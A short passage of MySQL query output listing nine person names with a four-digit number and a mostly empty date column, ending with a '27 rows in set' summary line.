| Daniel Farenga | 9581 | 0000-00-00 |
| Fernando Silva | 3030 | 0000-00-00 |
| Hector Franchini | 2020 | 0000-00-00 |
| Nestor Gassetti | 5050 | 0000-00-00 |
| Juan Gonzalez | 4040 | 0000-00-00 |
| Alejandro Dominguez | 6060 | 0000-00-00 |
| Ana Bellomo | 3003 | 2002-11-16 |
| Ariel Kehoc | 0671 | NULL |
| María Fernanda Carrara | 3182 | NULL |
+------------------------+-------+------------+
27 rows in set (0.04 sec)